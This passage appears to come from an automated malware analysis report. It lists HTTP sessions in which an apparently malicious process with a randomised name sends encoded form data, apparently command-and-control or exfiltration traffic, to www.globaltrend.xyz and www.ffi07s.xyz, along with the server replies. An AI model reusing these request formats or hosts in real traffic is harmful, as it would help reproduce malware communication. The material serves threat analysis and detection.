                                                      Data Raw: 6c 76 2d 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 46 36 43 4d 32 74 58 48 6f 63 52 64 75 6c 75 64 37 6f 4a 50 47 68 74 71 70 74 62 78 4a 36 46 6f 38 76 6e 37 35 54 59 45 4c 6f 53 48 48 2f 61 50 64 30 4f 6b 6d 57 52 65 49 47 6b 55 39 6b 73 56 77 44 35 54 72 46 62 68 62 49 7a 42 46 56 73 6d 57 78 41 78 55 39 58 6b 68 71 51 69 6b 38 37 4f 61 34 54 61 76 53 2f 66 52 72 2b 34 6c 46 33 31 69 35 79 70 54 42 4a 67 32 67 31 44 74 6e 4f 39 4c 68 33 6d 54 4e 79 52 4a 38 78 34 2f 61 46 45 45 77 71 58 71 66 38 5a 50 43 77 6d 38 49 61 2f 4d 2f 77 38 4d 4b 5a 67 3d 3d
                                                      Data Ascii: lv-=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSF6CM2tXHocRdulud7oJPGhtqptbxJ6Fo8vn75TYELoSHH/aPd0OkmWReIGkU9ksVwD5TrFbhbIzBFVsmWxAxU9XkhqQik87Oa4TavS/fRr+4lF31i5ypTBJg2g1DtnO9Lh3mTNyRJ8x4/aFEEwqXqf8ZPCwm8Ia/M/w8MKZg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.949734188.114.97.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:35.406910896 CEST1869OUTPOST /srh8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.globaltrend.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.globaltrend.xyz
                                                      Referer: http://www.globaltrend.xyz/srh8/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 65 30 49 43 53 37 66 47 44 38 4a 4d 54 50 30 4e 67 30 39 34 4e 54 52 4c 46 56 47 2b 76 53 4e 36 42 2b 4f 74 52 67 30 63 53 64 75 6c 31 64 37 72 4a 50 48 78 74 71 52 70 62 78 31 45 46 75 34 76 6e 5a 78 54 4a 51 58 6f 59 48 48 2f 47 2f 64 78 52 55 6e 65 52 65 59 61 6b 55 4e 6b 73 56 77 44 35 53 37 46 53 51 62 49 31 42 46 57 38 57 57 39 52 68 55 5a 58 67 30 58 51 69 78 42 34 2b 36 34 51 36 2f 53 39 4e 70 72 39 59 6c 44 32 46 69 68 79 70 58 43 4a 67 71 61 31 43 4a 42 4f 36 6e 68 33 51 4f 43 6f 31 52 39 6f 70 66 5a 48 44 38 55 6c 53 62 36 34 6f 36 34 70 6a 59 75 48 2f 68 30 36 49 56 31 4d 30 63 51 63 46 6d 59 31 47 52 6d 44 57 67 49 4b 4a 48 36 6d 54 74 4d 42 51 30 4b 6d 2f 45 51 4f 57 72 46 2b 44 46 76 55 2f 42 73 56 75 61 35 4e 76 35 33 6e 49 74 53 7a 45 5a 4e 62 54 7a 4f 44 39 56 53 4b 55 52 6e 61 4d 6e 55 47 67 57 6c 49 47 39 4e 65 4e 79 76 4a 64 69 64 68 4f 55 62 51 38 33 71 75 4d 4d 43 5a 71 32 44 52 6d 37 56 2b 33 6f 68 41 2f 66 46 53 52 47 32 4b 67 [TRUNCATED]
                                                      Data Ascii: lv-=FSwoOmqr8YoFe0ICS7fGD8JMTP0Ng094NTRLFVG+vSN6B+OtRg0cSdul1d7rJPHxtqRpbx1EFu4vnZxTJQXoYHH/G/dxRUneReYakUNksVwD5S7FSQbI1BFW8WW9RhUZXg0XQixB4+64Q6/S9Npr9YlD2FihypXCJgqa1CJBO6nh3QOCo1R9opfZHD8UlSb64o64pjYuH/h06IV1M0cQcFmY1GRmDWgIKJH6mTtMBQ0Km/EQOWrF+DFvU/BsVua5Nv53nItSzEZNbTzOD9VSKURnaMnUGgWlIG9NeNyvJdidhOUbQ83quMMCZq2DRm7V+3ohA/fFSRG2KgNWHowkVGGAClwnsi9rcxGVgheaPaS8Ik3Ph/rnHqKznlMZnxxoPsmTC2MVmGCqQeS8+6VKT/x+AH8X40lXSeYM+fOY8HN6LceXH/YYxBCMvYyXJ5HSmULRWfmATYTWkAbecCVA/sziJ311EJdWl9hEsu/pf9F5+P/PlO/mOL0c9oI3Wk+feJoF6psy8x8K80DwjPkFo9HW+QttdW9P3IU8kM4bZTX58UZrTpLy8t5hnr2Wz9YfocXS252OG4uxPOds1MP7sIAqNUiBLfFhM2NSORf9Lx6gR5pllNaWbqH3i42U1JPkC5TdQ/hb8li61FVZEnqxv50YGWA1rJpIT/LLI8xMjFJUg8waupNDpe79zDUTdZhfKJ6BywYyKytToWNUDgLGZnCGdOcLvkUubJDvGDOL2xZEaQtHYA7qPNIYeTST9xFxiRXNKd7carlY9v1zRYJhh9GQWhxVc0fTOtJ4R+DdW21ixXn2kHfn/qI6tCAZyYt2U3ibCbpqOz/yX0NNdM636o4ziAzckMUfXqTkflfA4iKAN7kx+le2Z7DFDzYg7OJXv343CI56wIROJAOdsHuUVquK9R/3doXCuU53X9be1GWrUQiSZhszIe08NUMadKoaIQX+3oJAvAr9CwgUCFliCp0p7/0h0h6EeYWPdufdf+OyIvpX [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.949735188.114.97.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:38.004076958 CEST567OUTGET /srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.globaltrend.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:39.950083971 CEST657INHTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 09 Jul 2024 10:09:39 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://www.globaltrend.xyz
                                                      X-Powered-By: PHP/7.4.6
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cw7nfhUzjNXBsAHsu19wxSiy3KtxqXk2DnMQn2A%2F6mVvWrPCUomfTI79VMiaDUYTGcoMYqg1ojbID7dJecVnkyv5BLQPQTKtWp3Q6ixWrZgDnWz31fR2rn9GtXv2%2Br5xMRAx3hDH"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078507089dc40e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.949736188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:45.087320089 CEST817OUTPOST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 33 61 45 4b 6d 42 51 30 5a 41 47 4a 63 31 75 6e 53 65 57 77 6b 38 69 68 37 34 33 47 71 71 35 68 71 75 39 58 49 69 42 74 6c 49 69 64 49 5a 4b 43 63 54 68 51 50 4a 62 70 38 6f 77 67 6f 6a 41 53 48 50 42 43 42 59 65 65 6e 73 4d 70 56 63 65 4d 32 58 5a 6f 36 53 50 62 46 50 38 50 33 4a 42 76 66 39 76 67 63 66 73 4c 59 7a 6a 7a 7a 50 53 74 79 2f 4e 39 67 75 30 66 74 34 7a 4e 2b 46 33 6e 71 6f 4a 4a 2b 30 56 39 6f 69 67 47 6e 6e 4c 33 4f 78 70 36 71 36 47 72 6a 4b 7a 37 73 47 4f 49 46 63 39 6f 55 68 6f 58 52 79 34 55 47 65 5a 59
                                                      Data Ascii: lv-=BpjM1753d9U43aEKmBQ0ZAGJc1unSeWwk8ih743Gqq5hqu9XIiBtlIidIZKCcThQPJbp8owgojASHPBCBYeensMpVceM2XZo6SPbFP8P3JBvf9vgcfsLYzjzzPSty/N9gu0ft4zN+F3nqoJJ+0V9oigGnnL3Oxp6q6GrjKz7sGOIFc9oUhoXRy4UGeZY
                                                      Jul 9, 2024 12:09:45.960496902 CEST890INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:45 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lRLjnKnb6m%2FNFuJVhLLnR87HvA7TixrfpwVhIhOGD8iuBYKSawC8WFn2Xz8lVkVoeHYc%2FNDSkUXxK5%2F%2FpDealfy%2BP1M1jDJEM9cvfeTc68GF5o8hzjndM9eEeyySYjcng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0785332c278cba-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 31 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 108Ln0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y2$;0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.949737188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:47.673365116 CEST841OUTPOST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 64 68 71 50 74 58 4a 6e 74 74 67 49 69 64 44 35 4b 48 59 54 68 58 50 4a 47 55 38 70 38 67 6f 6a 55 53 48 4c 4a 43 42 76 43 52 6b 63 4d 72 63 38 65 30 79 58 5a 6f 36 53 50 62 46 50 42 6b 33 4a 4a 76 66 4e 2f 67 64 37 34 4b 47 6a 6a 79 30 50 53 74 34 66 4d 32 67 75 31 79 74 38 7a 6e 2b 48 50 6e 71 70 35 4a 2f 6d 39 2b 6d 69 67 63 36 33 4b 47 65 68 67 57 71 4c 65 54 69 4a 65 51 78 58 43 6f 43 39 64 32 46 54 68 4d 45 6c 34 7a 42 35 51 77 56 35 41 52 4d 6a 6f 50 38 56 4c 58 51 35 38 41 33 6b 5a 73 71 51 3d 3d
                                                      Data Ascii: lv-=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZdhqPtXJnttgIidD5KHYThXPJGU8p8gojUSHLJCBvCRkcMrc8e0yXZo6SPbFPBk3JJvfN/gd74KGjjy0PSt4fM2gu1yt8zn+HPnqp5J/m9+migc63KGehgWqLeTiJeQxXCoC9d2FThMEl4zB5QwV5ARMjoP8VLXQ58A3kZsqQ==
                                                      Jul 9, 2024 12:09:48.562292099 CEST886INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:48 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tbB1IVtzmAALw6w487BfEl8wHN7TLu1UEbzaemxPWpEmlGyUH8x7ZQofwZz1ASITEHoTAX%2BvAnRKpGQnibEk195%2B9jVuA4urDVYgmHUdO1YzH4bBag%2Bww59qFrgwy4Mfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a0785435bb96a5f-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 31 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 108Ln0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y2$;0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.949738188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:50.267985106 CEST1854OUTPOST /y7ar/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.ffi07s.xyz
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.ffi07s.xyz
                                                      Referer: http://www.ffi07s.xyz/y7ar/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 42 70 6a 4d 31 37 35 33 64 39 55 34 32 2b 34 4b 72 41 51 30 4d 51 47 4b 58 56 75 6e 59 2b 57 30 6b 38 75 68 37 35 7a 57 71 5a 56 68 71 34 74 58 49 41 5a 74 6e 49 69 64 41 35 4b 47 59 54 68 47 50 4a 4f 59 38 70 41 65 6f 67 73 53 42 5a 52 43 49 39 71 52 2f 73 4d 72 65 38 65 50 32 58 5a 48 36 53 66 66 46 4c 68 6b 33 4a 4a 76 66 4c 37 67 55 50 73 4b 45 6a 6a 7a 7a 50 53 66 79 2f 4d 65 67 71 59 48 74 38 6e 64 2f 7a 7a 6e 6b 70 70 4a 35 54 4a 2b 35 79 67 43 37 33 4b 65 65 68 38 4a 71 4c 79 78 69 49 37 4c 78 57 32 6f 41 35 6f 49 52 43 6c 61 46 33 59 76 41 70 63 4a 56 64 41 6b 47 67 78 77 75 55 50 33 42 5a 4d 58 2b 6c 41 72 70 31 52 68 57 4f 79 32 37 79 68 53 4f 67 30 43 4b 6a 6e 6b 32 53 54 62 38 55 36 35 61 6f 4a 79 31 7a 38 32 74 66 75 42 6a 48 6f 48 35 4b 47 76 55 44 79 74 45 34 45 53 71 69 51 43 7a 32 42 6c 7a 48 64 69 62 2b 53 68 47 6a 64 4b 51 63 46 6f 58 35 41 45 41 56 66 45 54 61 35 49 73 39 4c 6f 54 34 61 55 51 6f 74 5a 32 6f 6e 62 33 56 73 77 30 71 74 79 68 75 6f 2f 32 2b 73 67 55 6d [TRUNCATED]
                                                      Data Ascii: lv-=BpjM1753d9U42+4KrAQ0MQGKXVunY+W0k8uh75zWqZVhq4tXIAZtnIidA5KGYThGPJOY8pAeogsSBZRCI9qR/sMre8eP2XZH6SffFLhk3JJvfL7gUPsKEjjzzPSfy/MegqYHt8nd/zznkppJ5TJ+5ygC73Keeh8JqLyxiI7LxW2oA5oIRClaF3YvApcJVdAkGgxwuUP3BZMX+lArp1RhWOy27yhSOg0CKjnk2STb8U65aoJy1z82tfuBjHoH5KGvUDytE4ESqiQCz2BlzHdib+ShGjdKQcFoX5AEAVfETa5Is9LoT4aUQotZ2onb3Vsw0qtyhuo/2+sgUmOIq1G3PnhEageXFF1V+mFmHJ4M+e5B2iE/AVQ6E0glY62nlqGT4/B4K5pbdF6ZDd8GdKoJnrUxiKm1ELhr6pSyIRUAKEqOuV7zvmqB/cPjmtTLWe+3qZzmTOUdk14Ijw0UyHZljefBfVNSPOifS6FH1gi+WUbS6DQkxiYOpgrL6GGYs1Tev75Yc8t3ELCBU/C8D6V0ATEQJJg8mc8kbLCEUd7BekjcH9f5aLqpf1Cy5Nzk8rrnGk/booNW3JtLhsHI1gHoujIloxhUwsYb/jmGkP+hfl3EDXfEHJJBrTUwupHv08ngMSfFbaIJCHghpZqqyTz9SXPxso85DgdzZ+s6OhXf8mYglftcpFPlp36dFEUSgmlmyFfgGuEi2jw9MKhaTtgjKDmdw9e5wIwIGXk8VUZq2i2Ichk8GyAuyg0z+MchNVWANxA+b4/ne35L5n/F2ib7VCjGouBzLjbfsg8okqmKSyDQXuhFETPTHeQcbrGRCEgcZsuaIChMFNm7V4wSUbHovLu6NCjZSZ3/Q6DMR3j+hfk0PzjnCuGNc/cgWh1JfVUY+kM53HCr393Hv0k/J4AwxgIWSWTMJ5ftEqm0wSCs44GuhtDv70Dy8p/cf8iqVy0xxhHd1hUpo1YtI2rL1J3s0SmzpEhc9Zux8UjCqpxQmgBAOhGk [TRUNCATED]
                                                      Jul 9, 2024 12:09:51.124180079 CEST890INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:51 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPR%2FbKwVoeKOOgpIs%2FuciWz6Un4VHFXYev0EsEzqhsb0vf8IuI0pH4ciZEtNxMqtpNmCAErJXYin2SdKMYy1HnqP9i5%2BvNfhKhYNupHBb%2BhicBTRDrgPMA2llrLdZEcfwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078553881f0f8b-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 31 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f cb 6e 83 30 10 45 f7 48 fc c3 d4 7b 98 34 61 d5 1a 4b 09 b8 02 89 3c 5a 39 ad b2 8c c0 ad 91 5a 4c ed 41 b4 7f 5f 01 5d 64 79 e7 6a ce d1 e5 77 f9 31 53 97 93 84 42 ed 2b 38 9d 77 55 99 01 8b 10 df 36 19 62 ae f2 a5 48 e2 d5 3d a2 3c 30 66 88 fa 07 c4 71 1c e3 71 13 5b f7 81 ea 05 0d 7d 7d 26 e8 c9 b5 35 c5 0d 35 4c 84 01 9f 1e 05 2f e4 36 17 5c 95 aa 92 e2 60 09 9e ec d0 35 1c 97 43 18 f0 bd 54 5b 28 94 3a 45 f2 f9 5c be a6 2c b3 1d e9 8e 22 f5 db 6b 06 ff 29 65 a4 7f 68 f6 3c 42 6d ae ce 6b 4a 07 1f 5d 7d dd b6 4c 70 9c 35 61 c0 77 c7 fc 22 b8 59 df ba cc 7a 6a 8c 13 bc 17 93 09 a4 73 d6 41 b2 4a 62 50 46 83 d3 df 83 f6 a4 1b 70 da db c1 d5 1a 5a 0f 9d 25 78 9f 00 31 c7 7e 02 e0 c2 c6 79 d7 1f 00 00 00 ff ff e3 e5 02 00 c8 32 24 ab 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 108Ln0EH{4aK<Z9ZLA_]dyjw1SB+8wU6bH=<0fqq[}}&55L/6\`5CT[(:E\,"k)eh<BmkJ]}Lp5aw"YzjsAJbPFpZ%x1~y2$;0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.949739188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:09:52.842521906 CEST562OUTGET /y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.ffi07s.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:09:53.716774940 CEST913INHTTP/1.1 404 Not Found
                                                      Date: Tue, 09 Jul 2024 10:09:53 GMT
                                                      Content-Type: text/html; charset=us-ascii
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pCRg47DPFKj4inlIhUwV0x07Y7XsBvb5GG5qpgFM3%2BNlPbvUyRwVKE1h15CLBZEK6A5MVlEaTEoqx1uoCIFSyZZ2ruI02YfqEbup2RH2TsXtaRWlzxN%2FufjjBx8X%2BuqlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8a078563aaa97cf9-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
